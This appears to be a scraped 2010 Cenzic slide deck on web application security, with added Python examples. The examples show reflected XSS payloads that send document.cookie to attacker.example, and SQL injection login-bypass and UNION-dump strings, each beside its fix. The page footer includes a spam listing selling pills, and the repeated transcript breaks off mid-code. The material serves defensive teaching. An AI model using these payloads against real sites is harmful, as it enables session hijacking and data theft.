The Web Application Security Crisis

    June 2010
    Jon Zucker - Senior Product Manager

Cenzic Confidential                       1
Agenda

 • Cenzic
 • Survey
 • Web App Security and evolution
 • Case Studies
 • Vulnerability examples
 • The “Tops”
 • Practical Approaches
 • Discussion/Q&A

About Cenzic

 • Cenzic secures Websites against hacker attacks via its automated Web vulnerability scanning technology (on-premise software, Hailstorm, and SaaS products)
 • Cenzic helps its customers secure trillions of dollars in Web commerce
 • Cenzic provides compliance testing for GLBA / PCI / SOX & other regulations

Survey…

 • Current situation
 • Solutions deployed
    • Manual
    • Dynamic
    • Static
    • WAF
    • Other
 • On Premise
 • SaaS
 • How often

Corporate Security Evolution

[Diagram: Client -> Internet -> Firewall -> IDS/IPS (Intrusion Detection and Prevention) -> Web Server -> App Server -> Database Server. Caption on the firewall: “Ports 443 & 80 still open”.]

Desktop and Content Security (1980s) -> Network Security (1990s) -> Application Security (2000s)

[Slide 6: graphic of ports 80 and 443, the HTTP and HTTPS ports the firewall has to leave open and through which application-layer attacks arrive.]

Why Web security?

Drivers for Web Application Security

 • Protecting brands
    • Security breach at App layer can seriously hurt customer trust
 • Complying with regulations
    • PCI, GLBA, HIPAA, AB 1950, and many others
 • Testing all applications on a continuous basis
    • To stay ahead of new vulnerabilities

Protect from the 400+ new threats per month by continually testing Production Applications

So what’s in my Web Application?

[Diagram, reconstructed as a list by layer:]
 • User
 • UI Layer (Web Browser): JavaScript, Java, DOM, HTML/DHTML, Cookies, Plug-Ins/API
 • Communication Layer: HTTP, HTTP-S, SSL, Authentication, Digital Certificates, Signatures
 • Middleware Layer (Web Server SW/HW, App Server): ASP, COM, LDAP Server, CORBA, DCOM
 • Data Layer: Databases, XML, HTML, Raw Data, CSS/XSL, File System
 • Source Code - Individual Applications: Financial, HR, Inventory, Order Management

Stats

 • Hackers are attacking everyone…
    • Banks, Credit Unions, Government Agencies, Small companies, Large companies – Equal opportunity
 • 87% of Websites are vulnerable to attack
   Source: SearchSecurity – January 2009
 • 75% of enterprises experienced some form of cyber attack in 2009
   Source: Symantec Internet Security Report – April 2010
 • 90% of Websites are vulnerable to attack
   Source: Verizon Business Data Breach Report – April 2009
 • $6.6 Million is the average cost of a data breach
   Source: Ponemon Institute – January 2009

Vulnerability trends
[Chart not reproduced. Source: Cenzic Q3-Q4, 2009 Application Trends Report]

Web Vulnerabilities by class (Commercial Apps)
[Chart not reproduced. Source: Cenzic Q3-Q4, 2009 Application Trends Report]

Vulnerability Breakdown of Misc. Category
[Chart not reproduced. Source: Cenzic Q3-Q4, 2009 Application Trends Report]

Web Vulnerabilities by class (Proprietary apps)
[Chart not reproduced. Source: Cenzic Q3-Q4, 2009 Application Trends Report]

Findings from Cenzic ClickToSecure Managed
[Chart not reproduced. Source: Cenzic Q3-Q4, 2009 Application Trends Report]

No One Wants To Be in the Press

 • “Who is responsible when a hack occurs?”
 • “False sense of Security”
 • “Concerns with finding all vulnerabilities”
 • “Worried”

Why worry?
Source: People's Daily Online 5-19-10

A total of 81 government Web sites in China were tampered from May 10 to May 16, down 35 percent compared to the previous week, according to a report released by National Computer Network Emergency Response Technical Team. As of 12 p.m. on Monday, 29 hacked government Web sites had still not been restored, including four provincial Web sites. Monitoring shows major threats are from software risk loopholes, spread of malicious codes and page revisions. The report revealed 150 .CN malicious domain names, five malicious codes and five software loopholes. And .xorg.pl, a malicious domain group registered in Poland, has more than 100 malicious domain names and has been used to tamper with many Chinese Web sites and users. Data shows security awareness and security measures should be strengthened. And 124 government Web sites were hacked from May 2 to May 9.

Key points called out on the slide:
 • 81 govt sites tampered May 10th-16th, down 35%
 • 29 hacked sites still not restored
 • 150 .CN malicious domain names
 • 5 malicious codes
 • 5 software loopholes
 • Malicious domain group registered in Poland with 100 malicious domain names
 • Security awareness and security measures should be strengthened
 • 124 Web sites were hacked from May 2-9

Case Studies

Specific Hacking Case Studies:
Heartland

 • Disclosed in January, 2009
 • Up to 130M cards exposed – largest attack (more than TJX)
    • Not discovered until late 2008
 • Impact:
    • Stock price went down 78%
    • Breach related expenses of $140 million
    • Millions of dollars in damages and recovery
    • Embarrassment for the company
    • Revenue loss
 • Learning:
    • PCI compliance ≠ App security
    • The intrusion began with SQL injection against a Web application (per the 2009 U.S. indictment of Albert Gonzalez and co-conspirators), the vulnerability class covered later in this deck

Specific Hacking Case Studies:
RBS World Pay

 • Disclosed in December, 2008
 • Up to 1.5M cards stolen
    • Installed Malware
    • Cloned cards were given to an army of “cashers” across 49 cities around the world
    • Visited 2,100 ATM machines in 280 cities
 • Impact:
    • $9M stolen in less than 12 hours
    • Embarrassment for the company
    • Reputation damage
 • Learning:
    • Hackers are getting very sophisticated and organized

Vulnerability Examples

Cross-Site Scripting (XSS)

 • What is it?: A flaw in web applications that lets a malicious user inject script into the web pages viewed by other users. The Web Application is used to store, transport, and deliver the malicious active content to an unsuspecting user, whose browser runs it as if it were the site’s own code. Used by attackers to bypass access controls such as the same origin policy. Recently, used to craft powerful phishing attacks and browser exploits.
 • Root Cause: Failure to reject or scrub malicious characters from input vectors and, more fundamentally, failure to encode untrusted data for the context (HTML body, attribute, JavaScript, URL) in which the page renders it. Input filtering is a fragile first line; context-aware output encoding at render time is the control that actually closes the hole.

Impacts of XSS

 • Session Hijacking: Hacker can steal the session id of the user and use it to conduct transactions
 • Record Key Strokes: Hacker can record all the keystrokes of the victim
 • Entry point: Hacker can use the victim’s browser as a foothold into the network and pivot deeper into other servers the victim can reach
 • Steal information: A victim’s files and PII exposed through the application can be accessed and exploited by the hacker

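Added example, not from the Cenzic deck: the reflected-XSS pattern described above, in Python, against a constructed search page that echoes the query back in HTML text context. It shows the concatenation flaw, why a `<script>`-tag blacklist of the kind the “scrub malicious characters” root cause suggests stops only the textbook payload, and the output-encoding fix. The two payloads (the first is the session-hijacking case, shipping `document.cookie` off-site), the `attacker.example` host, the page template and the `has_active_content` detection helper are all constructed for illustration.

```python
"""Added example, not from the Cenzic deck: reflected XSS in a search page,
a tag blacklist that fails, and output encoding that closes the hole."""
import html
import re

# Constructed payloads (classic patterns, not taken from the page). The first is
# the session-hijacking case: it sends document.cookie to a host the attacker
# controls; attacker.example is a hypothetical name.
SESSION_STEAL = (
    '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'
)
# Same goal, no <script> tag: an event handler on an image that fails to load.
BLACKLIST_BYPASS = (
    "<img src=x onerror=\"new Image().src='http://attacker.example/?c='+document.cookie\">"
)

# Hypothetical page template: the search term is echoed back in HTML text context.
TEMPLATE = "<html><body><h1>Results for: {query}</h1></body></html>"


def render_vulnerable(query: str) -> str:
    """The 'before': user input is pasted straight into the page."""
    return TEMPLATE.format(query=query)


def render_blacklisted(query: str) -> str:
    """The 'scrub malicious characters' approach: strip <script> tags only.
    Stops the textbook payload and nothing else (no handler attributes, no
    other tags, no encoding tricks)."""
    cleaned = re.sub(r"(?i)</?script[^>]*>", "", query)
    return TEMPLATE.format(query=cleaned)


def render_safe(query: str) -> str:
    """The fix for an HTML text context: entity-encode at output time so
    < > & " ' are displayed to the user rather than parsed by the browser."""
    return TEMPLATE.format(query=html.escape(query, quote=True))


# Hypothetical detection helper: does the rendered page contain a script tag
# or an inline event-handler attribute? Sufficient for these three renderers;
# a real scanner would parse the HTML rather than regex it.
_ACTIVE_CONTENT = re.compile(r"<script\b|<\w+[^>]*\son\w+\s*=", re.IGNORECASE)


def has_active_content(page: str) -> bool:
    """True if the page still carries executable content after rendering."""
    return _ACTIVE_CONTENT.search(page) is not None


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable),
                         ("blacklisted", render_blacklisted),
                         ("safe", render_safe)):
        for payload in (SESSION_STEAL, BLACKLIST_BYPASS):
            print(f"{name:12s} active={has_active_content(render(payload))}")
```

Only `render_safe` neutralises both payloads; the blacklist passes the `onerror` variant untouched. Encoding is context-specific: `html.escape` is right for text and quoted attribute values, but data placed inside a `<script>` block or a URL needs JavaScript or URL encoding instead.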
SQL Injection

 • What is it?: Database contents are compromised or disclosed by the use of specially crafted form input that manipulates SQL Query Logic.
 • Root Cause: Failure to properly sanitize, reject, or escape domain-specific SQL characters from an input vector. More precisely, untrusted input is concatenated into the query text instead of being passed as a bound parameter, so the database cannot tell data from code; parameterized queries remove the problem, while escaping merely chases it.

Impacts of SQL Injection

 • Customer information: Hacker can get access to all your customer records
 • Public Defacement: Hackers can easily deface thousands of sites with one attack
 • Database Server: Hacker can compromise a database server with SQL attacks
 • Bypass Log-in: By injecting a few SQL tokens (a quote, OR 1=1, a comment marker) into a login form, a hacker can bypass the credential check

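Added example, not from the Cenzic deck: the login bypass and the “all your customer records” disclosure listed above, reproduced in Python against a constructed in-memory SQLite database, beside the parameterized queries that close both. The schema, the `alice` account, the product rows and the two attack strings are constructed for illustration; the code is the editor’s, not Cenzic’s.

```python
"""Added example, not from the Cenzic deck: SQL injection login bypass and
data disclosure against a constructed SQLite database, and the parameterised fix."""
import hashlib
import sqlite3


def _hash(password: str) -> str:
    # Hashing the password does nothing for injection through the *username*
    # field, which is where the bypass below goes in.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed sample schema and data (hypothetical, for illustration)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO users (username, pw_hash) VALUES (?, ?)",
                 ("alice", _hash("correct horse")))
    conn.executemany("INSERT INTO products (name) VALUES (?)", [("widget",), ("gadget",)])
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str):
    """The 'before': user input is spliced into the SQL text, so a quote and a
    comment marker in the username rewrite the WHERE clause."""
    sql = ("SELECT username FROM users "
           f"WHERE username = '{username}' AND pw_hash = '{_hash(password)}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username: str, password: str):
    """The fix: bound parameters. The driver sends values separately from the
    query text, so a quote in the input is only ever data."""
    row = conn.execute("SELECT username FROM users WHERE username = ? AND pw_hash = ?",
                       (username, _hash(password))).fetchone()
    return row[0] if row else None


def find_products_vulnerable(conn, term: str) -> list:
    """A search box built the same wrong way: a UNION in the term pulls rows
    from another table, which is how customer records leave the building."""
    sql = f"SELECT name FROM products WHERE name LIKE '%{term}%'"
    return [r[0] for r in conn.execute(sql).fetchall()]


def find_products_safe(conn, term: str) -> list:
    """Parameterised LIKE. Caveat: % and _ in the term are still LIKE wildcards;
    escape them separately if that matters (a correctness issue, not injection)."""
    rows = conn.execute("SELECT name FROM products WHERE name LIKE ?",
                        ("%" + term + "%",)).fetchall()
    return [r[0] for r in rows]


# Constructed attack strings (classic patterns, not taken from the page).
LOGIN_BYPASS = "' OR 1=1 --"
UNION_DUMP = "zzz%' UNION SELECT username || ':' || pw_hash FROM users --"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login as:", login_vulnerable(db, LOGIN_BYPASS, "anything"))  # alice
    print("safe login as:", login_safe(db, LOGIN_BYPASS, "anything"))              # None
    print("vulnerable search:", find_products_vulnerable(db, UNION_DUMP))          # ['alice:<sha256>']
    print("safe search:", find_products_safe(db, UNION_DUMP))                       # []
```

The `--` comment marker discards the rest of the original query, so the password check never runs; with bound parameters the same string is compared literally against `username` and matches nothing. The UNION needs only the column count to line up with the original SELECT, which is why a single-column search box is enough to read a whole other table.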
The “tops”

Top 5 Web Security Myths

 • I have SSL so that’ll protect my Web site
    • SSL ≠ App Security: TLS encrypts the channel, and an XSS or SQL injection payload travels through that channel exactly as well as legitimate traffic does
 • Have never been hacked
    • How do you know?
 • PCI compliant
    • Heartland, Hannaford…
 • I can test a few of my Web applications once a year
    • Any vulnerable site is your weakest link
 • Expensive
    • Many flexible options to get you started

Top Reason #1

Web Applications Are Getting More Complex
 • Web 2.0 technologies exacerbate the problem
    • Think you are not using Web 2.0? Think again!
 • e.g. Software mashups
    • How do you know any of the original apps is secure?
    • How do you know the resulting app does not include new vulns?

Top Reason #2

Compliance Pressure Isn’t Letting Up
(PCI, SOX, GLBA, HIPAA, FFIEC, …)

 • Each regulation may have some level of implication on application security
 • PCI DSS Requirement 6 has specific provisions for Web security: Requirement 6.6 calls for public-facing Web applications to be reviewed for vulnerabilities (manually or with automated tools) at least annually and after any change, or to be protected by a Web application firewall
 • We expect more regulations to follow suit
    • California AB 211, section 1, 56.36 (b)

Top Reason #3

Third Party Code is Prevalent
    • Outsourced, open source, and packaged applications
 • Enterprises use more open source code than they know
    • Apache, Net-SNMP, Zlib, JBoss
 • Few software outsourcing providers have secure coding provisions or service level guarantees
 • Do you know the security quality of third-party code and apps?

Practical Approaches

Application Security Maturity Model

[Chart: x-axis People & Process (Low to High), y-axis Tools & Technology (Low to High). Stages from low to high: Panic Scramble, Pit of Despair, Security as Core Business Process.]

Enterprise Security Challenge

[Diagram: C-Level (“Will I get Hacked?”) above Information Security, which faces several Business Units; each Business Unit has its own Dev and QA teams and applications (App 1, App 2, App 3) moving through Pre-Production (Dev, QA, Staging) into Production.]

Web & Software Security Lifecycle

[Timeline: Training -> Planning -> Dev Begins -> Alpha/Beta -> Production/Launch -> update1 -> update2 -> ..., with Scanning/Testing running from development through every update.]

Application Security is NOT a One Time Event but a Discipline Over Time!

SDLC & Black Box Testing

[Diagram: the Software Development Life Cycle phases Design, Build, Deploy, Operate, with testing activities laid across them in roughly this order: Code Review (Design/Build), Build & Test Automation (Build), White Box Testing (Build), Black Box Testing (Deploy), Pen Test (Deploy/Operate), and Decision Support & Process Optimization spanning the whole cycle.]

You May Have To Change
Internal Procedures & Processes

 • Buy in
    • Management
    • Grass roots
 • Create a dedicated application security role
    • Align this role with business, operations, development and QA
    • Define responsibility and accountability structure
 • Engage business to define priorities, standards, and policies

Seat at the table…

You May Have To Change
Internal Procedures & Processes

 • Move certain security functions into operations
    • Security measures must be simple enough for non-experts
    • Must integrate with existing operational procedures and tools
 • Metrics
    • Implement reporting and metrics to measure risk
    • Identify technology solutions/services that will provide meaningful metrics
    • Review, rinse, repeat

START!

Final Thoughts

 • This is real
 • Bad guys are getting smarter
 • Think about process/strategy
 • Test frequently
 • Starting Early = less $$

Jon Zucker jon@cenzic.com
     www.Cenzic.com | 1-866-4-CENZIC (1-866-423-6942)



Cenzic Confidential                                     40

More Related Content

Recently uploaded

Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 

Recently uploaded (20)

TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 

Featured

How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental Health
ThinkNow
 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie Insights
Kurio // The Social Media Age(ncy)
 

Featured (20)

2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot
 
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPT
 
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsProduct Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage Engineerings
 
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental Health
 
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfAI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
 
Skeleton Culture Code
Skeleton Culture CodeSkeleton Culture Code
Skeleton Culture Code
 
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024
 
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)
 
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024
 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie Insights
 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024
 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary
 
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd
 
Getting into the tech field. what next
Getting into the tech field. what next Getting into the tech field. what next
Getting into the tech field. what next
 
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentGoogle's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search Intent
 
How to have difficult conversations
How to have difficult conversations How to have difficult conversations
How to have difficult conversations
 
Introduction to Data Science
Introduction to Data ScienceIntroduction to Data Science
Introduction to Data Science
 
Time Management & Productivity - Best Practices
Time Management & Productivity -  Best PracticesTime Management & Productivity -  Best Practices
Time Management & Productivity - Best Practices
 
The six step guide to practical project management
The six step guide to practical project managementThe six step guide to practical project management
The six step guide to practical project management
 
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
 

The Web Application Security Crisis

  • 1. The Web Application Security Crisis June 2010 Jon Zucker - Senior Product Manager Cenzic Confidential 1
  • 2. Agenda  Cenzic  Survey  Web App Security and evolution  Case Studies  Vulnerability examples  The “Tops”  Practical Approaches  Discussion/Q&A Cenzic Confidential 2
  • 3. About Cenzic  Cenzic secures Websites against hacker attacks via its automated Web vulnerability scanning technology (on-premise software Hailstorm and SaaS products)  Cenzic helps its customers secure trillions of dollars in Web commerce  Cenzic provides compliance testing for GLBA / PCI / SOX & other regulations Cenzic Confidential 3
  • 4. Survey…  Current situation  Solutions deployed • Manual • Dynamic • Static • WAF • Other  On Premise  SaaS  How often Cenzic Confidential 4
  • 5. Corporate Security Evolution Web App Database Client Firewall IDS/IPS Server Server Server Intrusion Detection And Prevention Internet Ports 443 & 80 still open Desktop and Content Network Security Application Security Security 1990s 2000s 1980s Cenzic Confidential 5
  • 6. 80 443 Cenzic Confidential 6
  • 7. Why Web security? Cenzic Confidential 7
  • 8. Drivers for Web Application Security  Protecting brands • Security breach at App layer can seriously hurt customer trust  Complying with regulations • PCI, GLBA, HIPAA, AB 1950, and many others  Testing all applications on a continuous basis • To stay ahead of new vulnerabilities Protect from the 400+ new threats per month by continually testing Production Applications Cenzic Confidential 8
  • 9. So what’s in my Web Application? User JavaScript HTML/ Web DOM UI Layer Cookies Plug-Ins/ API Java DHTML Browser SSL Digital HTTP HTTP-S Authentication Communication Layer Certificates Signatures Web COM App Server ASP Middleware Layer Server CORBA DCOM LDAP Server SW/HW Databases XML HTML Data Layer Raw Data CSS/XSL File System Financial HR Source Code - Individual Applications Order Inventory Management Cenzic Confidential 9
  • 10. Stats  Hackers are attacking everyone… • Banks, Credit Unions, Government Agencies, Small companies, Large companies – Equal opportunity  87% of Websites are vulnerable to attack Source: SearchSecurity – January 2009  75% of enterprises experienced some form of cyber attack in 2009 Source: Symantec Internet Security Report – April 2010  90% of Websites are vulnerable to attack Source: Verizon Business Data Breach Report – April 2009  $6.6 Million is the average cost of a data breach Source: Ponemon Institute – January 2009 Cenzic Confidential 10
  • 11. Vulnerability trends Source: Cenzic Q3-Q4, 2009 Application Trends Report Cenzic Confidential 11
  • 12. Web Vulnerabilities by class – (Commercial Apps) Source: Cenzic Q3-Q4, 2009 Application Trends Report Cenzic Confidential 12
  • 13. Vulnerability Breakdown of Misc. Category Source: Cenzic Q3-Q4, 2009 Application Trends Report Cenzic Confidential 13
  • 14. Web Vulnerabilities by class – (Proprietary apps) Source: Cenzic Q3-Q4, 2009 Application Trends Report Cenzic Confidential 14
  • 15. Findings from Cenzic ClickToSecure Managed Source: Cenzic Q3-Q4, 2009 Application Trends Report Cenzic Confidential 15
  • 16. No One Wants To Be in the Press “Who is responsible when a hack occurs?” “False sense of Security” “Concerns with finding all vulnerabilities” “Worried” Cenzic Confidential 16
  • 17. Why worry? Source: People's Daily Online 5-19-10 A total of 81 government Web sites in China were  81 govt sites tampered from May 10 to May 16, down 35 percent compared to the previous week, according  May 10th-16th to a report released by National Computer Network Emergency Response Technical Team.  down 35% As of 12 p.m. on Monday, 29 hacked government  29 hacked sites…still not been Web sites had still not been restored, including restored four provincial Web sites. Monitoring shows major threats are from software risk loopholes, spread of  150 .CN malicious domain names malicious codes and page revisions. The report revealed 150 .CN malicious domain  5 malicious codes names, five malicious codes and five software loopholes. And .xorg.pl, a malicious domain group  5 software loopholes registered in Poland, has more than 100 malicious domain names and has been used to tamper with  Malicious domain group registered many Chinese Web sites and users. in Poland Data shows security awareness and security  100 malicious domain names measures should be strengthened. And 124 government Web sites were hacked from May 2 to  Security awareness and security May 9. measure should be strengthened  124 Web sites were hacked form May 2-9 Cenzic Confidential 17
  • 19. Specific Hacking Case Studies: Heartland  Disclosed in January, 2009  Up to 130M cards exposed – largest attack (more than TJX) • Not discovered until late 2008 • Impact: • Stock price went down 78% • Breach related expenses of $140 million • Millions of dollars in damages and recovery • Embarrassment for the company • Revenue loss • Learning: • PCI compliance ≠ App security Cenzic Confidential 19
  • 20. Specific Hacking Case Studies: RBS World Pay  Disclosed in December, 2008  Up to 1.5M cards stolen • Installed Malware • Cloned cards were given to an army of “cashers” across 49 cities around the world • Visited 2,100 ATM machines in 280 cities • Impact: • $9M stolen in less than 12 hours • Embarrassment for the company • Reputation damage • Learning: • Hackers are getting very sophisticated and organized Cenzic Confidential 20
  • 21. Vulnerability Examples Cenzic Confidential 21
  • 22. Cross-Site Scripting (XSS)  What is it?: Found in web applications which allow code injection by malicious web users into the web pages viewed by other users. The Web Application is used to store, transport, and deliver malicious active content to an unsuspecting user. Used by attackers to bypass access controls such as the same origin policy. Recently, used to craft powerful phishing attacks and browser exploits.  Root Cause: Failure to proactively reject or scrub malicious characters from input vectors. Cenzic Confidential 22
Impacts of XSS

• Session hijacking: the attacker's script reads the victim's session id (for example from document.cookie) and uses it to conduct transactions as the victim
• Record keystrokes: the script can log everything the victim types into the page
• Entry point: script running in the victim's browser can reach applications on the internal network that the attacker cannot reach directly
• Steal information: any data the application shows to the victim, including PII, can be read and sent to the attacker
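An added example (mine, not Cenzic's or this deck's code) that shows the reflected case in Python: the vulnerable rendering beside the encoded one, in both the HTML-body and the quoted-attribute context, plus the reflection check a black-box scanner runs to find it. The host attacker.example and both payloads are constructed for illustration.

```python
import html

# Constructed attacker payload for the "session hijacking" impact above. The
# host attacker.example is a placeholder, not a real site.
COOKIE_THEFT = (
    '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'
)

# Constructed payload for an attribute context: no '<' is needed, a quote is
# enough to close the attribute value and add an event handler.
ATTR_BREAKOUT = '" autofocus onfocus="alert(document.cookie)'


def render_search_vulnerable(query: str) -> str:
    """Reflects the raw search parameter into the HTML body (reflected XSS)."""
    return f"<h1>Results for {query}</h1>"


def render_search_fixed(query: str) -> str:
    """Encodes the parameter for the HTML body context before rendering."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def render_input_vulnerable(name: str) -> str:
    """Same bug inside a quoted attribute value."""
    return f'<input type="text" name="q" value="{name}">'


def render_input_fixed(name: str) -> str:
    """html.escape with quote=True also encodes the quotes that would close
    the attribute, so the payload stays inert data."""
    return f'<input type="text" name="q" value="{html.escape(name, quote=True)}">'


def reflects_unencoded(render, probe: str) -> bool:
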